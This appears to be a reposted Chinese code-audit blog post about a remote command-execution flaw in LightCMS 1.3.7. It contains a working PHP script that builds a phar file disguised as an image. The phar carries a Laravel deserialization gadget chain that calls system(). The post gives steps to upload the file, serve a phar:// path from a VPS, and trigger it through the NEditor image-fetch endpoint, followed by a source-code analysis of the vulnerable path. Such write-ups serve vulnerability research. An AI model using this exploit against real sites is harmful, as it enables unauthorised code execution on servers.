[PHP代码审计]LightCMS1.3.7存在命令执行漏洞
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[PHP代码审计]LightCMS1.3.7存在命令执行漏洞相关的知识,希望对你有一定的参考价值。
写在前面
之前就想复现来着了,后来给我忘了,今晚补上吧
利用姿势
首先用phpggc
生成一个phar
,当然嫌弃懒的话可以用这个
<?php
namespace Illuminate\\Broadcasting{
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
class BroadcastEvent
{
protected $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Illuminate\\Bus{
class Dispatcher{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace{
$command = new Illuminate\\Broadcasting\\BroadcastEvent('whoami');
$dispater = new Illuminate\\Bus\\Dispatcher("system");
$PendingBroadcast = new Illuminate\\Broadcasting\\PendingBroadcast($dispater,$command);
$phar = new Phar('phar.phar');
$phar -> stopBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");
$phar -> addFromString('test.txt','test');
$phar -> setMetadata($PendingBroadcast);
$phar -> stopBuffering();
rename('phar.phar','phar.jpg');
}
之后上传到你的后台获得相对路径
之后在你的vps中写入
phar://./upload/image/202106/uzOpshR76Znv0gG6mvL9YHBRXPI5EaEDFpwqfgCp.gif
最后请求,成功执行
分析
漏洞点和之前爆出的任意文件读取与RCE那个地方一样,在Http/Controllers/Admin/NEditorController.php
下的fetchImageFile
函数,因为我传入的不是Webp文件,所以进入Image::make($data);
,而这个data变量也就是请求返回的内容
一直跟进到src/Intervention/Image/AbstractDecoder.php
下的init
方法
public function init($data)
{
$this->data = $data;
switch (true) {
case $this->isGdResource():
return $this->initFromGdResource($this->data);
case $this->isImagick():
return $this->initFromImagick($this->data);
case $this->isInterventionImage():
return $this->initFromInterventionImage($this->data);
case $this->isSplFileInfo():
return $this->initFromPath($this->data->getRealPath());
case $this->isBinary():
return $this->initFromBinary($this->data);
case $this->isUrl():
return $this->initFromUrl($this->data);
case $this->isStream():
return $this->initFromStream($this->data);
case $this->isDataUrl():
return $this->initFromBinary($this->decodeDataUrl($this->data));
case $this->isFilePath():
return $this->initFromPath($this->data);
// isBase64 has to be after isFilePath to prevent false positives
case $this->isBase64():
return $this->initFromBinary(base64_decode($this->data));
default:
throw new NotReadableException("Image source not readable");
}
}
在isUrl分支
继续跟踪
妥妥的可以触发phar://
反序列化
以上是关于[PHP代码审计]LightCMS1.3.7存在命令执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章